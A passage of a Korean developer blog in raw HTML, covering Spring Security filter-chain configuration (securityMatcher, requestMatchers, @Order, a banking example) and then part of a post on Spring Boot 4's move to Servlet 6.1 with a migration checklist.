class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <h1 id="securitymatcher-vs-requestmatchers-뭐가-다른가">securityMatcher vs requestMatchers: 뭐가 다른가?</h1> <p>헷갈리기 쉬운 부분입니다:</p> <ul> <li><code class="language-plaintext highlighter-rouge">http.securityMatcher()</code>: 이 <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> 자체가 어떤 요청에 적용될지 결정</li> <li><code class="language-plaintext highlighter-rouge">requestMatchers()</code>: 체인 안에서 개별 인가 규칙이 어떤 요청에 적용될지 결정</li> </ul> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">securedFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="s">"/secured/**"</span><span class="o">)</span> <span class="c1">// 이 체인은 /secured/**에만 적용</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="s">"/secured/user"</span><span class="o">).</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"USER"</span><span class="o">)</span> <span class="c1">// 세부 규칙</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="s">"/secured/admin"</span><span class="o">).</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">)</span> <span class="c1">// 세부 규칙</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <p><strong>중요:</strong> <code class="language-plaintext highlighter-rouge">securityMatcher</code>를 지정하면 매칭되는 요청만 보호됩니다. 매칭 안 되는 요청은 스프링 시큐리티가 보호하지 않아요! 따라서 <code class="language-plaintext highlighter-rouge">securityMatcher</code> 없는 기본 체인을 하나 두는 게 좋습니다.</p> <h1 id="securityfilterchain-엔드포인트-주의사항">SecurityFilterChain 엔드포인트 주의사항</h1> <p>필터 체인이 제공하는 엔드포인트(예: <code class="language-plaintext highlighter-rouge">/login</code>, <code class="language-plaintext highlighter-rouge">/logout</code>)는 <code class="language-plaintext highlighter-rouge">securityMatcher</code>의 영향을 자동으로 받지 않습니다:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">1</span><span class="o">)</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">securedFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="s">"/secured/**"</span><span class="o">)</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">((</span><span class="n">formLogin</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">formLogin</span> <span class="o">.</span><span class="na">loginPage</span><span class="o">(</span><span class="s">"/secured/login"</span><span class="o">)</span> <span class="c1">// 커스텀 경로</span> <span class="o">.</span><span class="na">loginProcessingUrl</span><span class="o">(</span><span class="s">"/secured/login"</span><span class="o">)</span> <span class="c1">// 커스텀 경로</span> <span class="o">.</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">logout</span><span class="o">((</span><span class="n">logout</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">logout</span> <span class="o">.</span><span class="na">logoutUrl</span><span class="o">(</span><span class="s">"/secured/logout"</span><span class="o">)</span> <span class="o">.</span><span class="na">logoutSuccessUrl</span><span class="o">(</span><span class="s">"/secured/login?logout"</span><span class="o">)</span> <span class="o">.</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">defaultFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">denyAll</span><span class="o">()</span> <span class="c1">// 나머지는 모두 거부</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <h1 id="실전-예제-뱅킹-시스템">실전 예제: 뱅킹 시스템</h1> <p>마지막으로 실제 서비스처럼 복잡한 예제를 봅시다:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">BankingSecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">UserDetailsService</span> <span class="nf">userDetailsService</span><span class="o">()</span> <span class="o">{</span> <span class="nc">UserBuilder</span> <span class="n">users</span> <span class="o">=</span> <span class="nc">User</span><span class="o">.</span><span class="na">withDefaultPasswordEncoder</span><span class="o">();</span> <span class="nc">InMemoryUserDetailsManager</span> <span class="n">manager</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">InMemoryUserDetailsManager</span><span class="o">();</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user1"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">,</span> <span class="s">"VIEW_BALANCE"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user2"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"admin"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="k">return</span> <span class="n">manager</span><span class="o">;</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">1</span><span class="o">)</span> <span class="c1">// 가장 높은 우선순위</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">approvalsSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">approvalsPaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/accounts/approvals/**"</span><span class="o">,</span> <span class="s">"/loans/approvals/**"</span><span class="o">,</span> <span class="s">"/credit-cards/approvals/**"</span> <span class="o">};</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="n">approvalsPaths</span><span class="o">)</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">)</span> <span class="o">)</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">2</span><span class="o">)</span> <span class="c1">// 두 번째 우선순위</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">bankingSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">bankingPaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/accounts/**"</span><span class="o">,</span> <span class="s">"/loans/**"</span><span class="o">,</span> <span class="s">"/credit-cards/**"</span><span class="o">,</span> <span class="s">"/balances/**"</span> <span class="o">};</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">viewBalancePaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/balances/**"</span> <span class="o">};</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="n">bankingPaths</span><span class="o">)</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="n">viewBalancePaths</span><span class="o">).</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"VIEW_BALANCE"</span><span class="o">)</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"USER"</span><span class="o">)</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="c1">// 기본 체인 (가장 낮은 우선순위)</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">defaultSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">allowedPaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/"</span><span class="o">,</span> <span class="s">"/user-login"</span><span class="o">,</span> <span class="s">"/user-logout"</span><span class="o">,</span> <span class="s">"/notices"</span><span class="o">,</span> <span class="s">"/contact"</span><span class="o">,</span> <span class="s">"/register"</span> <span class="o">};</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="n">allowedPaths</span><span class="o">).</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">((</span><span class="n">formLogin</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">formLogin</span> <span class="o">.</span><span class="na">loginPage</span><span class="o">(</span><span class="s">"/user-login"</span><span class="o">)</span> <span class="o">.</span><span class="na">loginProcessingUrl</span><span class="o">(</span><span class="s">"/user-login"</span><span class="o">)</span> <span class="o">)</span> <span class="o">.</span><span class="na">logout</span><span class="o">((</span><span class="n">logout</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">logout</span> <span class="o">.</span><span class="na">logoutUrl</span><span class="o">(</span><span class="s">"/user-logout"</span><span class="o">)</span> <span class="o">.</span><span class="na">logoutSuccessUrl</span><span class="o">(</span><span class="s">"/?logout"</span><span class="o">)</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p>이 설정의 로직:</p> <ol> <li> <p><strong>승인 관련 경로</strong> (<code class="language-plaintext highlighter-rouge">@Order(1)</code>): <code class="language-plaintext highlighter-rouge">/accounts/approvals/**</code>, <code class="language-plaintext highlighter-rouge">/loans/approvals/**</code>, <code class="language-plaintext highlighter-rouge">/credit-cards/approvals/**</code>는 ADMIN 권한 필요, HTTP Basic 인증 사용</p> </li> <li><strong>뱅킹 경로</strong> (<code class="language-plaintext highlighter-rouge">@Order(2)</code>): <code class="language-plaintext highlighter-rouge">/accounts/**</code>, <code class="language-plaintext highlighter-rouge">/loans/**</code>, <code class="language-plaintext highlighter-rouge">/credit-cards/**</code>, <code class="language-plaintext highlighter-rouge">/balances/**</code> 중에서 <ul> <li><code class="language-plaintext highlighter-rouge">/balances/**</code>는 <code class="language-plaintext highlighter-rouge">VIEW_BALANCE</code> 권한 필요</li> <li>나머지는 <code class="language-plaintext highlighter-rouge">USER</code> 권한 필요</li> <li><code class="language-plaintext highlighter-rouge">/approvals/</code>가 포함된 요청은 이미 첫 번째 체인에서 처리되므로 여기선 안 걸림</li> </ul> </li> <li><strong>기본 경로</strong> (우선순위 가장 낮음): <ul> <li><code class="language-plaintext highlighter-rouge">/</code>, <code class="language-plaintext highlighter-rouge">/user-login</code>, <code class="language-plaintext highlighter-rouge">/user-logout</code>, <code class="language-plaintext highlighter-rouge">/notices</code>, <code class="language-plaintext highlighter-rouge">/contact</code>, <code class="language-plaintext highlighter-rouge">/register</code>는 인증 없이 접근 가능</li> <li>나머지는 인증 필요</li> <li>폼 로그인 사용</li> </ul> </li> </ol> <h1 id="마무리하며">마무리하며</h1> <p>스프링 시큐리티의 핵심을 정리하면:</p> <ol> <li><strong>필터 체인 기반 아키텍처</strong>: 서블릿 필터를 기반으로 작동</li> <li><strong>DelegatingFilterProxy</strong>: 서블릿 컨테이너와 스프링을 연결</li> <li><strong>FilterChainProxy</strong>: 여러 SecurityFilterChain 중 적절한 것을 선택</li> <li><strong>SecurityFilterChain</strong>: 실제 보안 필터들의 집합</li> <li><strong>우선순위</strong>: <code class="language-plaintext highlighter-rouge">@Order</code>로 체인 실행 순서 제어</li> <li><strong>매처 구분</strong>: <code class="language-plaintext highlighter-rouge">securityMatcher</code>(체인 적용 범위) vs <code class="language-plaintext highlighter-rouge">requestMatchers</code>(개별 규칙)</li> </ol> <p>이 글이 오랜만에 스프링 시큐리티를 만지는 분들께 도움이 되길 바랍니다. 기억이 가물가물할 때 다시 읽어보세요! 🚀</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Fri, 09 Jan 2026 13:00:00 +0900 http://thecodinglog.github.io/spring/security/2026/01/09/remind-spring-security.html http://thecodinglog.github.io/spring/security/2026/01/09/remind-spring-security.html Spring Security Spring Security Spring Boot 4와 Servlet 6.1 - 현대적 웹 애플리케이션으로의 진화 <h1 id="들어가며">들어가며</h1> <p>Spring Boot 4가 출시되면서 가장 큰 변화 중 하나는 <strong>Servlet 6.1을 필수로 요구</strong>한다는 점입니다. 이번 글에서는 Servlet의 역사부터 Spring Boot와의 관계, 그리고 최신 변화까지 살펴보겠습니다.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h1 id="servlet이란-무엇인가">Servlet이란 무엇인가?</h1> <p>Servlet은 Java로 웹 애플리케이션을 만들 때 HTTP 요청을 처리하는 <strong>서버 측 프로그램</strong>입니다. Spring Boot로 API를 만들면, 내부적으로는 Servlet 기술이 동작하고 있습니다. Spring의 <code class="language-plaintext highlighter-rouge">DispatcherServlet</code>도 결국 Servlet을 확장한 것이죠.</p> <p>쉽게 말해, Servlet은 웹 서버와 애플리케이션 사이의 <strong>통역사</strong> 역할을 합니다. 사용자의 요청을 받아서 Java 코드로 전달하고, 그 결과를 다시 HTTP 응답으로 변환해주는 거죠.</p> <h1 id="spring-boot와-servlet의-관계">Spring Boot와 Servlet의 관계</h1> <p>Spring Boot는 내부적으로 Tomcat, Jetty 같은 <strong>내장 웹 서버(Embedded Container)</strong>를 사용합니다. 이 웹 서버들이 바로 Servlet 컨테이너인데요, Spring Boot 버전이 올라갈 때마다 요구하는 Servlet 버전도 함께 올라갑니다.</p> <h3 id="버전별-매핑-한눈에-보기">버전별 매핑 한눈에 보기</h3> <table> <thead> <tr> <th>Spring Boot</th> <th>Spring Framework</th> <th>최소 Servlet</th> <th>Jakarta EE</th> <th>지원 컨테이너</th> </tr> </thead> <tbody> <tr> <td>1.x ~ 2.0.x</td> <td>4.x ~ 5.x</td> <td>3.0</td> <td>Java EE 7/8</td> <td>Tomcat 7/8, Jetty 8/9</td> </tr> <tr> <td>2.1.x ~ 2.7.x</td> <td>5.1.x ~ 5.3.x</td> <td>3.1</td> <td>Java EE 8</td> <td>Tomcat 9/10</td> </tr> <tr> <td>3.0.x ~ 3.3.x</td> <td>6.0.x ~ 6.1.x</td> <td>6.0</td> <td>Jakarta EE 10</td> <td>Tomcat 10.1 (Java 17+)</td> </tr> <tr> <td><strong>4.0+</strong></td> <td><strong>7.0+</strong></td> <td><strong>6.1</strong></td> <td><strong>Jakarta EE 11</strong></td> <td><strong>Tomcat 11, Jetty 12</strong></td> </tr> </tbody> </table> <p>보시다시피 Spring Boot 4는 Spring Framework 7과 함께 Servlet 6.1을 기반으로 합니다. 이는 단순한 버전업이 아니라, <strong>Jakarta EE 11</strong>이라는 새로운 플랫폼으로의 전환을 의미합니다.</p> <h1 id="servlet의-진화-과정">Servlet의 진화 과정</h1> <p>Servlet은 20년 넘게 꾸준히 발전해왔습니다. 주요 버전별 특징을 살펴보겠습니다.</p> <h3 id="servlet-30-2009년---현대화의-시작">Servlet 3.0 (2009년) - 현대화의 시작</h3> <ul> <li><strong>비동기 처리</strong> 도입: 긴 작업을 처리할 때 쓰레드를 블로킹하지 않고 효율적으로 처리</li> <li><strong>어노테이션 지원</strong>: <code class="language-plaintext highlighter-rouge">@WebServlet</code>, <code class="language-plaintext highlighter-rouge">@WebFilter</code> 같은 어노테이션으로 web.xml 없이도 설정 가능</li> <li><strong>파일 업로드 개선</strong>: 멀티파트 업로드를 표준으로 지원</li> </ul> <h3 id="servlet-31-2013년---성능-강화">Servlet 3.1 (2013년) - 성능 강화</h3> <ul> <li><strong>논블로킹 I/O</strong>: 네트워크 통신을 더욱 효율적으로 처리</li> <li><strong>HTTP 프로토콜 업그레이드</strong>: WebSocket 같은 새로운 프로토콜 지원</li> <li><strong>보안 강화</strong>: 더 안전한 웹 애플리케이션 개발 가능</li> </ul> <h3 id="servlet-50-2020년---대전환">Servlet 5.0 (2020년) - 대전환</h3> <p>가장 큰 변화는 <strong>패키지 이름 변경</strong>입니다:</p> <ul> <li><code class="language-plaintext highlighter-rouge">javax.servlet</code> → <code class="language-plaintext highlighter-rouge">jakarta.servlet</code></li> </ul> <p>이게 왜 중요할까요? Oracle이 Java EE를 Eclipse 재단에 기부하면서, 상표권 문제로 <code class="language-plaintext highlighter-rouge">javax</code>를 더 이상 사용할 수 없게 되었습니다. 그래서 모든 패키지 이름을 <code class="language-plaintext highlighter-rouge">jakarta</code>로 바꾼 거죠. Spring Boot 3부터 이 변화가 적용되었고, 기존 코드에서 import 문을 모두 수정해야 했습니다.</p> <h3 id="servlet-60-2022년---현대화">Servlet 6.0 (2022년) - 현대화</h3> <ul> <li><strong>Java SE 17 기준</strong>: 최신 Java 기능 활용</li> <li><strong>모듈화 개선</strong>: 더 나은 구조화</li> <li><strong>ByteBuffer 지원</strong>: 메모리 효율적인 I/O 처리</li> <li><strong>쿠키 처리 개선</strong>: 더 유연한 쿠키 설정</li> </ul> <h3 id="servlet-61-2024년---안정성-강화">Servlet 6.1 (2024년) - 안정성 강화</h3> <p>Spring Boot 4가 요구하는 최신 버전입니다:</p> <ol> <li><strong>SecurityManager 완전 제거</strong> <ul> <li>오래된 보안 메커니즘인 SecurityManager가 Java에서 deprecated 되면서 Servlet에서도 완전히 제거되었습니다</li> <li>더 이상 사용하지 않는 코드를 정리해서 경량화</li> </ul> </li> <li><strong>HTTP 상태 코드 및 문자 인코딩 개선</strong> <ul> <li>더 정확한 상태 코드 처리</li> <li>다국어 처리가 더욱 정교해짐</li> </ul> </li> <li><strong>Charset을 String 대신 직접 사용</strong> <ul> <li>문자 인코딩을 더 타입 안전하게 처리</li> <li>실수로 잘못된 인코딩 이름을 넣는 것을 방지</li> </ul> </li> <li><strong>ByteBuffer 지원 강화</strong> <ul> <li><code class="language-plaintext highlighter-rouge">ServletInputStream</code>/<code class="language-plaintext highlighter-rouge">OutputStream</code>에서 ByteBuffer를 직접 사용 가능</li> <li>대용량 데이터 처리 시 성능 향상</li> <li>비동기 I/O가 더욱 효율적으로 동작</li> </ul> </li> </ol> <h1 id="spring-boot-4에서의-실질적-변화">Spring Boot 4에서의 실질적 변화</h1> <h3 id="1-지원-컨테이너-변경">1. 지원 컨테이너 변경</h3> <ul> <li><strong>사용 가능</strong>: Tomcat 11, Jetty 12</li> <li><strong>제거됨</strong>: Undertow (Servlet 6.1 미지원)</li> </ul> <p>기존에 Undertow를 사용하던 프로젝트는 Tomcat이나 Jetty로 마이그레이션해야 합니다.</p> <h3 id="2-java-17-이상-필수">2. Java 17 이상 필수</h3> <p>Servlet 6.1이 Java 17을 기준으로 하기 때문에, Spring Boot 4도 최소 Java 17을 요구합니다. Java 8이나 11을 쓰던 프로젝트는 업그레이드가 필요합니다.</p> <h3 id="3-hibernate-70-전환">3. Hibernate 7.0 전환</h3> <p>Jakarta EE 11은 JPA 3.2를 포함합니다. 이에 따라 Hibernate도 7.x 버전으로 업그레이드되며, 몇 가지 주의할 점이 있습니다:</p> <ul> <li><strong>Dialect 설정 변경</strong>: 데이터베이스별 Dialect 클래스 경로나 설정 방식이 일부 변경될 수 있습니다</li> <li><strong>어노테이션 동작 변경</strong>: JPA 3.2의 새로운 기능과 개선사항이 반영되어 기존 어노테이션의 세부 동작이 달라질 수 있습니다</li> <li><strong>쿼리 최적화</strong>: Hibernate 7은 성능 개선과 함께 쿼리 생성 로직이 일부 변경되었습니다</li> </ul> <p>실무에서는 마이그레이션 전 충분한 테스트, 특히 복잡한 쿼리나 커스텀 Dialect를 사용하는 경우 동작 검증이 필요합니다.</p> <h3 id="4-가상-스레드virtual-threads-기본-활성화">4. 가상 스레드(Virtual Threads) 기본 활성화</h3> <p>Spring Boot 4는 Java 21 이상 환경에서 <code class="language-plaintext highlighter-rouge">spring.threads.virtual.enabled=true</code>를 기본값으로 채택하는 방향입니다. 가상 스레드는 경량 스레드로, 수만 개의 동시 연결을 효율적으로 처리할 수 있습니다.</p> <p><strong>주의사항:</strong></p> <ul> <li><strong>ThreadLocal 사용 점검</strong>: 스레드 로컬을 많이 사용하는 라이브러리(레거시 보안 필터, 일부 로깅 프레임워크 등)에서 메모리 누수가 발생할 수 있습니다</li> <li><strong>스레드 풀 설정 재검토</strong>: 기존의 스레드 풀 크기 설정이 가상 스레드 환경에서는 의미가 달라질 수 있습니다</li> <li><strong>호환성 확인</strong>: 사용 중인 서드파티 라이브러리가 가상 스레드를 지원하는지 확인이 필요합니다</li> </ul> <h3 id="5-observability-강화">5. Observability 강화</h3> <p>Servlet 6.1 레이어에서 발생하는 이벤트를 Micrometer가 더 세밀하게 추적합니다:</p> <ul> <li><strong>메트릭 명칭 변경</strong>: 대시보드에 표시되는 일부 메트릭 이름이 변경될 수 있어, Grafana나 Prometheus 대시보드 쿼리를 업데이트해야 할 수 있습니다</li> <li><strong>추적 정보 증가</strong>: HTTP 요청/응답에 대한 더 상세한 추적 정보가 수집됩니다</li> <li><strong>성능 오버헤드 최소화</strong>: 강화된 추적 기능에도 불구하고 성능 영향은 최소화되도록 설계되었습니다</li> </ul> <p>모니터링 환경을 구축한 경우, 업그레이드 후 대시보드와 알람 설정을 재검토하는 것이 좋습니다.</p> <h3 id="6-성능과-안정성-개선">6. 성능과 안정성 개선</h3> <p>ByteBuffer 지원이 강화되면서 특히 다음 상황에서 성능이 개선됩니다:</p> <ul> <li>파일 업로드/다운로드</li> <li>스트리밍 API</li> <li>대용량 데이터 처리</li> <li>실시간 통신</li> </ul> <h1 id="마이그레이션-체크리스트">마이그레이션 체크리스트</h1> <h3 id="버전-업그레이드-시-확인-사항">버전 업그레이드 시 확인 사항</h3> <ol> <li><strong>Java 버전 확인</strong> <ul> <li>Spring Boot 4 사용 시 최소 Java 17 필요 (가상 스레드는 Java 21+)</li> <li><code class="language-plaintext highlighter-rouge">pom.xml</code> 또는 <code class="language-plaintext highlighter-rouge">build.gradle</code>에서 Java 버전 설정 확인</li> </ul> </li> <li><strong>의존성 패키지 확인</strong> <ul> <li><code class="language-plaintext highlighter-rouge">javax.servlet</code> → <code class="language-plaintext highlighter-rouge">jakarta.servlet</code> 변경 여부 확인</li> <li>Spring Boot 3 이상이면 이미 jakarta로 전환됨</li> </ul> </li> <li><strong>웹 컨테이너 확인</strong> <ul> <li>Undertow 사용 중이면 Tomcat이나 Jetty로 변경</li> <li>기본 내장 Tomcat을 쓴다면 자동으로 Tomcat 11이 사용됨</li> </ul> </li> <li><strong>데이터베이스 레이어 점검</strong> <ul> <li>Hibernate Dialect 설정 확인</li> <li>JPA 쿼리 및 네이티브 쿼리 테스트</li> <li>트랜잭션 동작 검증</li> </ul> </li> <li><strong>가상 스레드 준비</strong> <ul> <li>ThreadLocal 사용 패턴 검토</li> <li>레거시 동기화 코드 확인</li> <li>성능 테스트 수행</li> </ul> </li> <li><strong>모니터링 환경 업데이트</strong> <ul> <li>메트릭 대시보드 쿼리 확인</li> <li>알람 임계값 재조정</li> <li>로그 포맷 변경 여부 확인</li> </ul> </li> <li><strong>테스트 실행</strong> <ul> <li>비동기 처리 부분 테스트</li> <li>파일 업로드/다운로드 기능 테스트</li> <li>문자 인코딩 관련 기능 테스트</li> <li>부하 테스트로 성능 검증</li> </ul> </li> </ol> <h1 id="실무-관점에서의-접근">실무 관점에서의 접근</h1> <p>대부분의 Spring Boot 애플리케이션은 Servlet을 직접 다루지 않습니다. <code class="language-plaintext highlighter-rouge">@RestController</code>, <code class="language-plaintext highlighter-rouge">@RequestMapping</code> 같은 Spring MVC 어노테이션을 사용하죠. 하지만 내부적으로는 모두 Servlet 위에서 동작합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// 일반적으로 작성하는 코드</span> <span class="nd">@RestController</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">UserController</span> <span class="o">{</span> <span class="nd">@GetMapping</span><span class="o">(</span><span class="s">"/users"</span><span class="o">)</span> <span class="kd">public</span> <span class="nc">List</span><span class="o">&lt;</span><span class="nc">User</span><span class="o">&gt;</span> <span class="nf">getUsers</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="n">userService</span><span class="o">.</span><span class="na">findAll</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> <span class="c1">// 내부적으로는 DispatcherServlet이 이 요청을 처리</span> <span class="c1">// DispatcherServlet → Servlet 6.1 기반으로 동작</span> </code></pre></div></div> <p>Servlet 버전이 올라가면서 이런 내부 동작이 더 빠르고 안정적으로 개선됩니다. 특히 가상 스레드와 결합되면, 동일한 하드웨어에서 훨씬 많은 동시 요청을 처리할 수 있습니다.</p> <h1 id="정리하며">정리하며</h1> <p>Spring Boot 4의 Servlet 6.1 요구사항은 단순한 